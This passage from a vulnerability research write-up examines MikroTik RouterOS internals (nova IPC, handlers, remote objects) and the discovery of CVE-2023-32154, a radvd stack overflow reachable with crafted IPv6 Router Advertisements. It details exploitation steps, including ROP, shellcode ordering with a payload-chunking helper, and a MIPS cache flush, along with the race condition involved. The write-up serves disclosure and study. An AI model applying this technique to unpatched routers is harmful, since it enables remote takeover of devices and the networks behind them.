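    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# XOR is its own inverse, so one function both obfuscates and recovers.
stored = xor_with_user_key(b"hunter2", "admin")
recovered = xor_with_user_key(stored, "admin")
```

Because the key depends only on the username and a fixed constant, anyone who can read the stored bytes can undo the transformation.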

As we can see, most of these vulnerabilities were found “in the wild,” so they teach us only a limited amount about analyzing and reversing RouterOS.

We continued to look for publicly available research materials. These articles and presentations were available at the time of the competition:

Review of the IPC and the Nova Message

Most of the research centers around RouterOS’s homebrew IPC, so we also took some time to review it. Here is a simple example to explain the main idea of the IPC.

Normally, a user can log in to the RouterOS through telnet, and manage the router by console.

Let’s follow the procedure step by step:

  1. When the user tries to access the RouterOS console through telnet, the telnet process spawns the login process with execl, and login asks the user for an account and password.
  2. After getting the account and password, login packs them into a nova message and sends it to the user process for authentication.
  3. The user process returns the result by sending back a nova message.
  4. If the login succeeds, the console process is spawned, and the user’s interaction with the console is actually proxied through the login process.

IPC

The above example simply describes the basic concept of IPC, but the communication between the two processes is actually more complex.

Every nova message would be sent to the loader process through the socket first, then the loader dispatches each nova message to the corresponding nova binary.

Suppose the id of the login process is 1039, the id of the user process is 13, and the handler with id 4 in the user process is responsible for verifying the account and password.

Firstly, the login process sends a request with an account and password to the user process, so the SYS_TO in nova message is an array with two elements 13, 4, which means that the message should be sent to the handler with id 4 in the process with binary id 13.

When loader receives the message, it will remove the 13 in SYS_TO of the message which represents the target binary id, and add the source binary id in SYS_FROM, which is 1039, and then send the message to the user process.

The user process does a similar thing when it receives a message: removing the 4 from SYS_TO that represents the target handler id and sending the nova message to handler 4 for processing.
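
The routing steps above can be sketched in a few lines of Python. This is only a toy model: messages are plain dicts, the string keys stand in for the integer key macros, and storing the sender id at the front of the SYS_FROM list is an assumption.

```python
SYS_TO, SYS_FROM = "SYS_TO", "SYS_FROM"  # stand-ins for the integer key macros


def loader_route(msg, source_binary_id):
    """Model the loader: pop the target binary id and record the sender."""
    target_binary, *rest = msg[SYS_TO]
    routed = dict(msg)
    routed[SYS_TO] = rest
    routed[SYS_FROM] = [source_binary_id] + list(msg.get(SYS_FROM, []))
    return target_binary, routed


def binary_route(msg):
    """Model the receiving binary: pop the handler id from SYS_TO."""
    handler_id, *rest = msg[SYS_TO]
    routed = dict(msg)
    routed[SYS_TO] = rest
    return handler_id, routed


# login (id 1039) asks handler 4 of the user process (id 13) to check credentials.
request = {SYS_TO: [13, 4], "account": "admin"}
binary_id, at_user = loader_route(request, source_binary_id=1039)
handler_id, at_handler = binary_route(at_user)
```

After both hops, SYS_TO is empty and SYS_FROM tells handler 4 where the reply should go.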

Nova Message

The nova message used in IPC is initialized and set by nv::message and related functions. Nova message is composed of typed key-value pairs, and the key can only be an integer, so keys such as SYS_TO and SYS_FROM are just simple macros.

The types that can be used in a nova message include u32, u64, bool, string, bytes, IP and nova message (i.e. you can create a nested nova message).

Because the RouterOS doesn’t use nova messages in JSON anymore, we only focus on the binary format of it.

During IPC communication, the receiver’s socket receives an integer that expresses the length of the current nova message, followed by the nova message in binary format.

The nova message starts with two magic bytes: M2. Next, each key is described by 4 bytes: the first 3 bytes express the id of the key, and the last byte is the type of the key. Depending on the type, the following bytes are parsed differently as data, the next key comes after the data, and so on. A special feature is that a bool can be represented by only one bit, so the lowest bit of the type is used to represent True/False. For a more detailed format, see Ian Dupont, Harrison Green. Pulling MikroTik into the Limelight.
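
As a rough illustration of the layout just described, the Python sketch below packs and unpacks a 4-byte key descriptor and frames a message body. Several details are assumptions made only for this example: the byte order, the 4-byte width of the length prefix, and the TYPE_BOOL value, which is a placeholder rather than the real type code.

```python
import struct

MAGIC = b"M2"
TYPE_BOOL = 0x00  # hypothetical type code; the real values are not given here


def pack_key(key_id: int, type_byte: int) -> bytes:
    """Pack a key descriptor: 3 bytes of key id followed by 1 type byte."""
    if not 0 <= key_id < 1 << 24:
        raise ValueError("key id must fit in 3 bytes")
    return key_id.to_bytes(3, "little") + bytes([type_byte])  # byte order assumed


def unpack_key(raw: bytes):
    """Split a 4-byte key descriptor back into (key_id, type_byte)."""
    return int.from_bytes(raw[:3], "little"), raw[3]


def pack_bool(key_id: int, value: bool) -> bytes:
    """A bool carries no data bytes: its value sits in the type's lowest bit."""
    return pack_key(key_id, TYPE_BOOL | int(value))


def frame(body: bytes) -> bytes:
    """Prefix the magic and body with a length (4-byte width is an assumption)."""
    payload = MAGIC + body
    return struct.pack("<I", len(payload)) + payload
```

For the authoritative type codes and value encodings, refer to the paper cited above.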

The x3 format

In order to understand which nova binary the ids in the SYS_TO and the SYS_FROM in the nova message refer to, we need to parse a file with the extension x3, which is an xml in binary format. By parsing the /nova/etc/loader/system.x3 with the tool, we can map which nova binary each id corresponds to.

The ids of some binaries are absent from this file because those binaries are made available by installing an official RouterOS package. In that case, the binary’s id is in /ram/pckg/<package_name>/nova/etc/loader/<package_name>.x3. The radvd binary is an example.

However, the ids of some binaries still cannot be found in any .x3 file because these processes are not persistent. One example is the login process, which is spawned only when a user tries to log in and uses a serial number as its id.

The .x3 file is also used to record nova binary related settings, e.g. www specifies in .x3 which servlet should be used for each URI.

Summary

After reviewing past research and CVEs, we can see that most of the vulnerabilities we are interested in date from several years ago, and pre-auth vulnerabilities on the WAN side of RouterOS seem difficult to find nowadays.

While vulnerabilities continue to be revealed, the RouterOS is becoming more and more secure. Is it true that there are no more pre-auth vulnerabilities on the RouterOS? Or maybe it’s just that everyone is missing something?

Most of the public research mentioned earlier falls into the following three categories:

  • Jailbreaking
  • The analysis of the exploits in the wild
  • The nova message in the IPC

However, after reversing the binary on RouterOS for a while, we realized that the complexity of the whole system was more than that, but no one mentioned the details. This led to the following thought: “No one with sanity would like to dive into the details of nova binary”.

Aside from the exploits leaked from the CIA and APT, most research on finding vulnerabilities in RouterOS involves fuzzing network protocols, playing with nova messages, or fuzzing nova messages.

Judging by the outcome, attackers seem to understand RouterOS much better than we do, and we need to explore more details of the nova binary to fill in the gaps and increase our chances of finding the vulnerabilities we are looking for. Don’t get me wrong: I’m not against fuzzing. But we must make sure we check everything essential to have an advantage in the contest.

Where to begin

We don’t think RouterOS is flawless; rather, there is a gap between researchers’ and attackers’ understanding of RouterOS. So, what are we missing to find a pre-auth RCE on RouterOS?

The first question that comes to mind is “where is the entry point of IPC and where does it lead?” Because most of the functionality triggered by IPC requires login, it is to be expected that sticking to IPC will only lead to more findings in post-auth. IPC is just one part of the main functionality implemented on RouterOS, and we would like to look at the core code of each functionality directly and carefully.

For example, how does the process that deals with DHCP extract the information it needs from a DHCP packet? This information may be stored directly in the process, or may need to be sent to other processes via IPC for further processing.

The Architecture of Nova Binary

Hence, we must first understand the architecture of the nova binary. Each nova binary has an instance of the Looper class (or a derivative of it: MultifiberLooper), which is a class for event loop logic. In each iteration, it calls runTimer to execute the timers that have expired, and uses poll to check the status of the sockets and then process them accordingly.

Looper is responsible for the communication between its nova binary and the loader. Looper first registers a special callback function: onMsgSock, which is responsible for dispatching the nova message received from the socket to the corresponding handler in the nova binary.
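
The loop structure described above (run expired timers, then poll the sockets and call their callbacks) can be sketched as follows. This is a generic Python event loop built on the standard selectors module, not a reconstruction of the real Looper class; all method names are hypothetical.

```python
import selectors
import socket
import time


class Looper:
    """Toy event loop: expired timers first, then readable sockets."""

    def __init__(self):
        self.selector = selectors.DefaultSelector()
        self.timers = []  # list of (deadline, callback)

    def add_socket(self, sock, callback):
        self.selector.register(sock, selectors.EVENT_READ, callback)

    def add_timer(self, delay, callback):
        self.timers.append((time.monotonic() + delay, callback))

    def run_timers(self):
        now = time.monotonic()
        due = [t for t in self.timers if t[0] <= now]
        self.timers = [t for t in self.timers if t[0] > now]
        for _, callback in due:
            callback()

    def run_once(self, timeout=1.0):
        self.run_timers()
        for key, _ in self.selector.select(timeout):
            key.data(key.fileobj)  # call the callback registered for this socket


events = []
sender, receiver = socket.socketpair()
looper = Looper()
looper.add_socket(receiver, lambda sock: events.append(sock.recv(16)))
looper.add_timer(0, lambda: events.append("timer"))
sender.send(b"ping")
looper.run_once()
looper.selector.close()
sender.close()
receiver.close()
```

In this model, a callback such as onMsgSock would simply be one more function registered with add_socket.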

The Handler class and its derivatives

When a looper receives a nova message, it will dispatch it to the corresponding handler, e.g., a message with SYS_TO of [14, 0] will be dispatched by the loader to a nova binary with a binary id of 14. By the time the looper in the binary with a binary id of 14 receives it, SYS_TO has [0] left, so the looper will dispatch it to handler 0 for processing. If the SYS_TO in the initial nova message is [14], then the looper receives it with SYS_TO as [], and the looper handles this message on its own.

Now let’s assume that the Looper receives a nova message that should be handled by handler 1 and dispatches it to handler 1. At this point, handler 1 calls the method nv::Handler::handleCmd in the vtable of the handler class, which looks for the corresponding function to execute in the vtable based on the SYS_CMD specified in the nova message.

The cmdUnknown in the vtable is often overridden to extend the functionality, but sometimes the developer overrides handleCmd instead, depending on the developer’s mood. The handler class is a base class, so commands related to objects are not implemented.
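
A small Python model may help picture this dispatch. It is a sketch under assumptions: the command numbers (1 and 99) and the class and method names are invented for illustration, and a dict lookup stands in for the vtable.

```python
class Handler:
    """Toy base handler: pick a method by SYS_CMD, else fall back to cmd_unknown."""

    COMMANDS = {}  # hypothetical command numbers -> method names

    def handle_cmd(self, msg):
        name = self.COMMANDS.get(msg["SYS_CMD"])
        if name is None:
            return self.cmd_unknown(msg)
        return getattr(self, name)(msg)

    def cmd_unknown(self, msg):
        return "unknown command"


class AuthHandler(Handler):
    COMMANDS = {1: "cmd_check"}

    def cmd_check(self, msg):
        return "checked " + msg["account"]

    def cmd_unknown(self, msg):
        # A subclass can extend the command set here instead of in COMMANDS.
        if msg["SYS_CMD"] == 99:
            return "extended command"
        return super().cmd_unknown(msg)


def looper_dispatch(handlers, msg):
    """Route by what is left in SYS_TO once the loader has done its part."""
    if not msg["SYS_TO"]:
        return "handled by looper"
    handler_id, *rest = msg["SYS_TO"]
    return handlers[handler_id].handle_cmd({**msg, "SYS_TO": rest})


handlers = {0: Handler(), 1: AuthHandler()}
result = looper_dispatch(handlers, {"SYS_TO": [1], "SYS_CMD": 1, "account": "admin"})
```

The two extension points match the text: a developer can add behavior in cmd_unknown, or override handle_cmd altogether.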

Derived class

However, the basic handler class is not the most used one in nova binaries, but rather a derivative of it. Derived classes can be used to store multiple objects of a single type, similar to C++ STL containers.

For example, when a user creates a DHCP server through the web panel, a nova message with the command “add object” is sent to handler 0 of the dhcp process, which then creates a dhcp server object. And the object will be stored in a tree of handler 0.

The handler 0 here is an instance of AMap, which is a derived class of Handler. Since the command is “add object”, it triggers the member function AMap::cmdAddObj, which calls a function at offset 0x7c in handler 0’s vtable. That function is actually the constructor of the object contained in AMap. For example, if the developer defines handler 0 to be of type AMap<string>, then the function at offset 0x7c is the constructor of the string.

The offset of the constructor of the inner object in the vtable is different for each derived class, and locating the constructor to determine what type of objects are contained in the derived class can be done by reversing their individual cmdAddObj function.
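
The idea of a container handler that builds its elements through a stored constructor can be sketched as below. This Python class is hypothetical and only mirrors the description: the construct attribute plays the role of the vtable slot, and a dict stands in for the tree.

```python
from itertools import count


class AMap:
    """Toy container handler that builds items through a stored constructor."""

    def __init__(self, construct):
        self.construct = construct  # stands in for the constructor slot in the vtable
        self.objects = {}           # a dict stands in for the tree
        self._ids = count(1)

    def cmd_add_obj(self, *args):
        """Handle "add object": construct the item and store it under a new id."""
        obj_id = next(self._ids)
        self.objects[obj_id] = self.construct(*args)
        return obj_id

    def element_type(self):
        """Mimic the reversing step: the constructor reveals the element type."""
        return self.construct


names = AMap(str)  # roughly the AMap<string> case from the text
first = names.cmd_add_obj("dhcp1")
```

Looking up the constructor reached from cmd_add_obj is the same move as locating the constructor offset in a real handler’s vtable.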

IPC, and something other than IPC

Some of the functions in RouterOS are not driven by IPC. Take the two layer 2 discovery protocols, CDP and LLDP, implemented in the discover program as an example.

  1. When starting the two services, handler 0 will be responsible for calling nv::createPacketReceiver to open the sockets and register the callback functions for CDP and LLDP.
  2. In each iteration, the Looper calls poll to check whether the CDP and LLDP sockets have received any packets.
  3. If packets are received, the corresponding callback function will be called to handle the packets.

What CDP’s callback does is very simple: it makes sure that the interface that received the packet is allowed, and if it is, it parses the packet and stores the information directly into the nv::ASecMap instead of using a nova message, and then returns.

It follows that IPC has no ability to trigger any function of CDP or LLDP other than to turn on CDP or LLDP services (which are turned on by default), so it is likely that previous research focused on IPC has not tested the program logic of such implementation.

The Story of Pre-Auth RCE

With this knowledge of RouterOS, a surprising accident led us to a long-hidden vulnerability.

One day, when we plugged and unplugged the network cable as usual for reversing and debugging on RouterOS, we found that the log file recorded that the program radvd had crashed several times! So we tried plugging and unplugging the cable to manually reproduce the crash so that we could use the debugger to locate the problem, but after thousands of plugs and unplugs, we still couldn’t determine the conditions under which the crash was occurring, and it appeared to be just a random crash.

After a period of trial and error, we tried to find out where the crash occurred by statically reversing radvd rather than trying blindly. Though in the end we still couldn’t find the root cause of the crash, we found another vulnerability in radvd while reviewing the core logic of the binary, thanks to our understanding of the nova binary.

Before describing this vulnerability, let’s first explain what the radvd process does.

SLAAC (Stateless Address Auto-Configuration)

In short, the radvd is a service that handles SLAAC for IPv6.

In a SLAAC environment, suppose a computer wants to get an IPv6 address to access the Internet. It first sends an RS (Router Solicitation) request to all routers. After a router receives the RS, it broadcasts the network prefix in an RA (Router Advertisement). Computers that receive the RA take the network prefix and combine it with an EUI-64 interface identifier to decide which IPv6 address to use for connecting to the Internet.
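
As a worked example of combining a prefix with EUI-64, the Python sketch below derives an address from a /64 prefix and a MAC address using the modified EUI-64 rule (insert ff:fe in the middle of the MAC and flip the universal/local bit). The prefix and MAC are made-up illustration values, and the function name is hypothetical.

```python
import ipaddress


def slaac_address(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """Combine a /64 prefix with a modified EUI-64 interface identifier."""
    net = ipaddress.IPv6Network(prefix)
    if net.prefixlen != 64:
        raise ValueError("EUI-64 based SLAAC expects a /64 prefix")
    octets = bytearray(int(part, 16) for part in mac.split(":"))
    octets[0] ^= 0x02  # flip the universal/local bit
    interface_id = bytes(octets[:3]) + b"\xff\xfe" + bytes(octets[3:])
    return net.network_address + int.from_bytes(interface_id, "big")


addr = slaac_address("2001:db8::/64", "00:11:22:33:44:55")
print(addr)  # 2001:db8::211:22ff:fe33:4455
```

Many modern hosts use randomized interface identifiers instead, but the prefix-plus-identifier structure is the same.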

Suppose an ISP or network administrator wants to assign a network segment to a user so that the user can assign addresses from it to user-managed machines. How can a segment be assigned when only SLAAC is used, without DHCP? Because SLAAC has no way to delegate a prefix directly, this is how it usually works:

Suppose there is an upstream router, Router A, which belongs to an ISP or a network administrator, along with a user-managed Router B and a user-managed computer. The ISP or the network administrator notifies the user via email in advance of the /48 network prefix assigned to the user, which is 2001:db8::/48 in this case. The user sets it on Router B. Then, when the computer sends an RS to Router B, Router B returns this prefix in an RA. This prefix is called the routed prefix.

For Router B to communicate with Router A, it also needs to get a network prefix from Router A for an IPv6 address of its own. The network prefix that Router B gets from Router A is called the link prefix.

The execution flow of the radvd

  1. When the radvd process is started, the socket used by radvd is opened by nv::ThinRunner::addSocket and the corresponding callback function is registered.
  2. In each iteration of the Looper in radvd, the socket is checked by calling poll to see whether it has received any packets.
  3. If any packets are received, the corresponding callback function is called to process them.

The callback function of radvd first checks whether the packet is a legitimate RA or RS. If it’s an RA, the callback stores the information; if it’s an RS, radvd starts broadcasting an RA on the LAN.

There are three cases in total in which RouterOS broadcasts the network prefix:

  1. Received RS from LAN
  2. Received RA from WAN
  3. Timed broadcast of RA packets on LAN (default random broadcast after 200~600 seconds)

But we didn’t find the code responsible for case 2 in the callback function by static reversing. At the time we were not sure why. It is actually related to the subscription mechanism in the RouterOS IPC, which we will explain in a later chapter. The other two cases, however, can be found directly through static analysis.

In case 1, when an RS is received from the LAN, radvd will call sendRA to broadcast the RA packet:

In case 3, handler 1 registers a timer, RAroutine, after initialization:

The RAroutine is used to call sendRA at regular intervals to broadcast packets:

CVE-2023-32154

After digging deeper into sendRA, we found that radvd has a vulnerability in handling DNS advisory. First, radvd stores the DNS advisory from the RA received from the upstream router (the data structure is a tree). When it broadcasts an RA to the LAN, these DNS addresses are also wrapped in the RA and broadcast to the LAN.

In radvd, it is the addDNS function that expands the tree and puts it into the ICMPv6 packet. In the following figure, the first parameter of addDNS, RA_raw, is a buffer of 4096 bytes, which is the final ICMPv6 packet.

Stepping into the addDNS, we can immediately see that there may be a stack buffer overflow here. The addDNS puts DNS into ICMPv6 packets via memcpy without any boundary check, and as long as the DNS advisory is big enough, it can trigger a stack buffer overflow.

The DNS records used here come from the RDNSS field in the RA packet, but according to the RFC, we can find that the field used to describe the length of RDNSS is only 8-bit. It can cover only 255*16 bytes at most, and this length is insufficient for us to overwrite the return address.

But if this is not the first time the radvd received RA, radvd needs to mark the old DNS as expired in the next packet, so we can actually cover twice the length, which is 255*16*2 bytes. That is enough for us to overwrite the return address.
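
The size argument above is simple arithmetic, worked through below together with what a bounds-checked copy could look like. This is a Python sketch, not the vendor’s fix: add_dns_checked is a hypothetical name, and the comparison ignores the RA header and other options that also occupy the buffer.

```python
BUFFER_SIZE = 4096   # size of RA_raw as given in the text
ADDRESS_SIZE = 16    # one IPv6 address
MAX_PER_RA = 255     # the per-RDNSS upper bound used in the text

one_ra = MAX_PER_RA * ADDRESS_SIZE  # 4080 bytes: still fits in the buffer
two_ras = 2 * one_ra                # 8160 bytes: well past the end of the buffer


def add_dns_checked(buffer: bytearray, used: int, addresses) -> int:
    """Copy addresses into buffer, refusing to write past its end."""
    for address in addresses:
        if used + len(address) > len(buffer):
            raise OverflowError("DNS list does not fit in the RA buffer")
        buffer[used:used + len(address)] = address
        used += len(address)
    return used
```

With such a check, 255 addresses are accepted, while the doubled list produced by two RAs is rejected instead of overflowing the stack.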

Attacking

Now, the attacker only needs to send two crafted RA packets with RDNSS field length of 255 to the target RouterOS, and the attacker can control the execution flow of the radvd program through the IPv6 address in the RDNSS.

The Protection of Binaries

Since the target RouterOS runs on the MIPS architecture, the CPU doesn’t support NX, and other protections are not enabled either.

So it’s just a matter of finding a good ROP gadget and letting the execution flow eventually jump to the shellcode we place on the stack, easy peasy lemon squeezy.

The Constraint of Shellcode

However, there are actually quite a number of limitations in the process of constructing an exploit, for example, since IPv6 addresses are stored in a tree structure, they are sorted before being placed on the stack, so we need to make sure that the payload we build remains the same after sorting.

The simplest way to do this is to make the IPv6 prefix to be a serial number, which ensures that the contents of our payload are in order, and that we can accurately jump to the shellcode through the ROP gadget. When writing the shellcode, we just need to construct the suffix of each address as a jump, so that we can skip the non-executable serial number.

However, due to the delay slot in MIPS, the CPU will actually execute the next instruction of the jump instruction first.

So we have to move the jump forward, but since we can’t use the syscall instruction in the delay slot, the payload will be a pain to construct and may exceed the length we can use, which is basically a bad idea.

In fact, this is a common beginner-level problem in CTFs. All we need is to make the prefix of each IPv6 address a legal instruction that does not affect the execution result. We change the prefixes to addi s8, s0, 1, addi s8, s0, 2, addi s8, s0, 3, and so on. Besides keeping the payload sorted, this also saves the space that would otherwise be used for jump instructions.
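
The ordering property can be checked with a short Python sketch. It encodes addi $s8, $s0, n as a 4-byte prefix (standard MIPS I-type encoding), attaches 12 placeholder bytes to each prefix, and confirms that sorting leaves the sequence unchanged. Big-endian byte order and byte-wise ordering of the tree are assumptions here, and the placeholder bytes are not real instructions.

```python
import struct


def addi_s8_s0(imm: int) -> bytes:
    """Encode the MIPS instruction `addi $s8, $s0, imm` (big-endian assumed)."""
    opcode, rs, rt = 0x08, 16, 30  # addi, $s0 (reg 16), $s8 (reg 30)
    word = (opcode << 26) | (rs << 21) | (rt << 16) | (imm & 0xFFFF)
    return struct.pack(">I", word)


def build_chunks(payload: bytes):
    """Split payload into 12-byte pieces, each behind a serial 4-byte prefix."""
    pieces = [payload[i:i + 12].ljust(12, b"\x00")
              for i in range(0, len(payload), 12)]
    return [addi_s8_s0(n) + piece for n, piece in enumerate(pieces, start=1)]


# Placeholder bytes in descending order, so only the prefix keeps them sorted.
chunks = build_chunks(bytes(range(255, 195, -1)))
order_is_stable = sorted(chunks) == chunks
```

Because each prefix is strictly larger than the previous one, the remaining 12 bytes of each address never influence the sort order.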

But we didn’t leak the stack address, and we couldn’t find any gadget that moves the stack address from the $sp register to the $t9 register. So what we did was first write a jalr $sp instruction to memory via a ROP gadget, and then jump to it with another ROP gadget so that it directs the flow to the shellcode we constructed. That sounds pretty good:

But this is not enough to run the shellcode, because MIPS has two different caches for memory access.

Cache

MIPS has two caches: I-cache (instruction cache) and D-cache (data cache).

When we write the jalr $sp instruction to memory, it’s actually written to the D-cache.

When we control the execution flow to jump to the address of jalr $sp, the processor first checks whether the instruction at this address is in the I-cache. Since we jump to a data section, this lookup always misses, and so the contents of memory are loaded into the I-cache.

However, since the contents of the D-cache have not been written back to memory, I-cache will only copy a bunch of null bytes from memory, which is nop in MIPS, so the radvd only runs a bunch of nop until it crashes.

Here we need to make the processor write the contents of the D-cache back to memory, and there are two ways to do this: a context switch or exhausting the D-cache space (32 KB).

Triggering a context switch is easier, but there is no sleep in radvd that we can use to trigger one, and while other functions can trap into the kernel, the chances of a context switch occurring are not very high. To compete in Pwn2Own, we need a consistent attack with a success rate close to 100%. Therefore, we looked for a way to exhaust the 32 KB D-cache.

First, a simple check shows that the randomize_va_space variable of RouterOS is 1, which means that the heap address is not randomized, so we don’t need a leak to know where the heap is. We just need to find a way to make the heap allocate enough space, and then write some gibberish to it to exhaust the 32 KB D-cache.

However, since there are no good ROP gadgets, such a payload will need too many ROP gadgets, and eventually the payload length may exceed the length we can cover.

Luckily, as mentioned earlier, the DNS addresses are stored in a tree structure, so they already occupy a large chunk of memory on the heap. By stepping through execution in gdb, we can confirm that by the time the DNS addresses are being processed, the heap is already bigger than 32 KB, so we just need to call memcpy through the GOT hijack to write 32 KB of gibberish to the heap, and that’s it!

Finally, our exploit is complete:

Combined with another Canon printer vulnerability we found for Pwn2Own, the attack flow would be:

  1. The attacker, as a bad neighbor of the router, sends crafted ICMPv6 packets to it.
  2. After successfully taking control of the router, the attacker sets up port forwarding to direct the payload to the Canon printer on the LAN.

In a Pwn2Own environment, the network environment can be simplified a bit as follows:

Debugging for Exploit

Just when we thought we had the $100,000 prize in the pocket, something unexpected happened: our exploit failed on Ubuntu, whether in a virtual machine on macOS or on a physical Ubuntu machine. Since the Pwn2Own officials basically use Ubuntu to run exploits, we had to solve this problem.

We tried running the exploit on macOS and recording the network traffic, then replaying the traffic on Ubuntu, and observed that the replay failed:

We also tried running the exploit on Ubuntu and recording the network traffic. Of course, it failed on Ubuntu. But when we replayed the failed traffic on macOS, it succeeded:

Up to this point, we guessed that one of the OSes reordered the packets before sending them out, and that might have been done after Wireshark captured the packets. So we wrote a sniffer and put it on the router to monitor the traffic, and the result should be very reliable since AF_PACKET type of sockets are not affected by the firewall rules:

However, the packets recorded from both sides are exactly the same……

So, apparently I’m the bus factor now. The exploit had only worked on my macOS machine so far, and if the situation didn’t change, the last resort would be to fly to Toronto with my Mac laptop and carry out the attack on site. But there was no way we were going to leave a problem of unknown cause unattended. Who knows whether it might hit my laptop during Pwn2Own as well? That would be a real loss.

After a few careful reviews, we finally found the cause of the problem: speed. Since the time window between the two RA packets is not that big, it’s hard to tell from the Wireshark timeline, but if you do the math, you’ll see that the interval between the two packets differs by a factor of 390 between the two systems. So the problem was not with Ubuntu. The Mac sent the two packets so fast that it accidentally triggered a race condition in radvd. (On top of that, I hadn’t properly calculated how many bytes it takes to overwrite the return address; I had just filled the buffer with gibberish and done a pattern match, so the offset was correct only under the race condition.)

The solution is to sleep for a while between sending two RA packets and fix the offset in the payload, which will stabilize our attack with a 100% chance of success.

Fix

This vulnerability has been fixed in the following releases:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8, 7.10
  • Testing Release 7.10rc6

We also found that this vulnerability has existed since RouterOS v6.0. According to the official website, v6.0 was released on 2013-05-20, which means the vulnerability sat there for nine years without anyone finding it.

Echoing our initial thought, “No one with sanity would like to dive into the details of nova binary”, Q.E.D.

The Race Condition

But how did this race condition, which kept us from easily earning $100,000, come about? As mentioned above, a nova binary has a Looper that loops to deal with events, i.e. it’s a single-threaded program, so what’s the race condition all about? (Some nova binaries are multi-fiber, but radvd isn’t.)

What I didn’t mention is that when radvd parses the RA packets received from the WAN, the DNS addresses are stored in a “vector”, but when preparing the RA packets for broadcasting on the LAN, addDNS expands a “tree” with the DNS addresses stored in it. So what is the relationship between this vector and the tree?

That’s why we didn’t find the logic “broadcasts RA packets to the LAN when it receives RA from the WAN” in the callback, because it’s the result of the interaction between the two processes.

If we take a closer look at what the callback does, we can see an array that holds objects called “remote objects”. The code looks intuitive: it iterates over a vector of DNS addresses, calls nv::roDNS once for each DNS address, and saves the result of each call in the DNS_remoteObject vector.

Remote Object

So what is a remote object? A remote object is a mechanism used in RouterOS to share resources across processes. One process is responsible for storing the shared resource, and another process can send requests to it to add, delete, or modify entries by specifying their ids. For example, the DNS remote objects actually live in handler 2 of the resolver process, while handler 1 of radvd simply keeps the ids of these objects.

Subscription and Notification

When a remote object is updated, other processes may want to respond, so a nova binary can subscribe to another nova binary in advance. Take dhcp and ippool6 as an example: handler 1 in ippool6 is responsible for managing the IPv6 address pool, and the dhcp process subscribes to handler 1 in ippool6. When the IPv6 address pool changes, dhcp can check whether the change needs further processing, such as shutting down a DHCP server.

A process subscribes by sending a nova message to the binary it wants to subscribe to, with a SYS_NOTIFYCMD that contains the specific conditions it wants to be notified about.

When another process adds an object to ippool6, handler 1’s cmdAddObj function will be executed.

In most cases, AddObj will call sendNotifies to notify subscribers who have subscribed to the 0xfe000b event that their subscribed objects have been altered, so ippool6 here sends a nova message to the dhcp process informing it of the result of the object being altered.

After understanding the subscription mechanism, we can more fully understand the interaction between radvd and the resolver as follows:

When radvd receives the RA packet from the WAN, it calls roDNS for each IPv6 address. Handler 4 in resolver handles this request and creates the corresponding ipv6 object in handler 2. Then, because handler 1 in radvd subscribes to handler 2 in resolver, handler 2 in resolver pushes all the DNS addresses it holds to radvd. Handler 1 in radvd then constructs an RA packet from the DNS addresses it received and broadcasts the packet on the LAN.

The Root Cause of Race Condition

The problem is actually in the implementation of roDNS, which uses postMessage to send a nova message. postMessage is non-blocking, meaning that the remote object in radvd does not immediately know which id it corresponds to in the resolver.

If our second packet arrives too soon, so that radvd doesn’t know what the remote object’s id is, then radvd can’t delete these objects in the first place, it can only mark them as destroyed for soft deletion, which results in a race condition.

Let’s try to understand the whole process step by step:

First, since both processes are single-threaded, we can assume that radvd and resolver are each in their first loop. radvd receives an RA from the WAN with only one DNS address and sends the resolver a request to create a remote object.

At the same time, the resolver sets a timer when it receives the first request. In the IPC mechanism, the resolver has no way of knowing how many AddObj requests belong to the same group, so it simply sets a timer and sends out a notification when the time is up. The resolver should also reply with a nova message as a response, informing radvd of the id of the remote object that has just been added, and radvd registers a corresponding ResponseHandler to handle this response.

However, if the second RA packet is delivered so fast that the resolver hasn’t sent the response back yet, radvd can only mark the old DNS remote object as destroyed for soft deletion first.

Then radvd proceeds to create a new DNS remote object for the RDNSS field in the second RA packet received, but since the resolver hasn’t finished the first iteration yet, this new request stays in the socket until the next iteration.

Going back to resolver, the first iteration ends by passing back an id to radvd. radvd’s ResponseHandler will update the remote object based on the id it gets. But since the corresponding remote object has been marked for deletion, the ResponseHandler will delete the object instead of updating the object id.

After the ResponseHandler deletes the remote object saved in radvd, it will send a delete object message to resolver, informing it that the corresponding remote object is no longer in use and has to be deleted, but the request will still be stuck in the socket waiting to be processed.

The resolver then proceeds to the second iteration, where it gets a request from the socket to create a remote object for the second RA.

At this point, the previously set timer expires and the resolver calls nv::Handler::sendChanges to notify all subscribers of the DNS entries the resolver now knows about. Since object 1 has not been deleted yet, the resolver pushes out the DNS entries created by both requests.

When radvd receives this information, it immediately constructs an RA packet to broadcast over the LAN, and the results of the two requests are mixed together, which is why our attack only succeeded on macOS at first.

The race condition may sound hard to trigger (it is not triggered if the delete request is processed before the timer fires), but that is because the whole process has been greatly simplified for ease of explanation. In practice, as long as the time between the arrival of the two packets is short enough, the race succeeds.
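The ordering described above can be replayed with a small toy model. This is only a sketch under simplifying assumptions: the names (`simulate`, `resolver_inbox`, `dns-A`, `dns-B`) are made up for illustration, the resolver's socket is modeled as a plain queue, and the timer is fired by hand at the point the text says it expires. It is not RouterOS code.

```python
from collections import deque


def simulate(second_ra_is_fast):
    """Replay the simplified radvd/resolver ordering and return the pushed notifications."""
    resolver_objects = {}      # id -> DNS address stored in the resolver
    resolver_inbox = deque()   # requests waiting in the resolver's socket
    notifications = []         # what the resolver pushes to its subscribers
    next_id = 1

    def resolver_handle_one():
        nonlocal next_id
        kind, arg = resolver_inbox.popleft()
        if kind == "add":
            resolver_objects[next_id] = arg
            next_id += 1
            return next_id - 1          # id sent back in the response
        resolver_objects.pop(arg, None)  # "delete" request
        return None

    def timer_fires():
        notifications.append(sorted(resolver_objects.values()))

    # First RA: radvd posts a non-blocking "add" and the resolver handles it.
    resolver_inbox.append(("add", "dns-A"))
    id_a = resolver_handle_one()

    if second_ra_is_fast:
        # radvd does not know id_a yet, so it can only soft-delete dns-A
        # and post the "add" for the second RA first.
        resolver_inbox.append(("add", "dns-B"))
        # The response arrives later; only now can the real delete be posted.
        resolver_inbox.append(("delete", id_a))
        resolver_handle_one()   # add dns-B
        timer_fires()           # timer expires before the delete is handled
        resolver_handle_one()   # delete dns-A, too late
    else:
        timer_fires()           # notification for the first RA only
        resolver_inbox.append(("delete", id_a))
        resolver_inbox.append(("add", "dns-B"))
        resolver_handle_one()
        resolver_handle_one()
        timer_fires()
    return notifications


print(simulate(second_ra_is_fast=True))
print(simulate(second_ra_is_fast=False))
```

In the fast case a single notification carries both addresses, which mirrors the mixed RA described above; in the slow case each notification carries one address.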

Summary

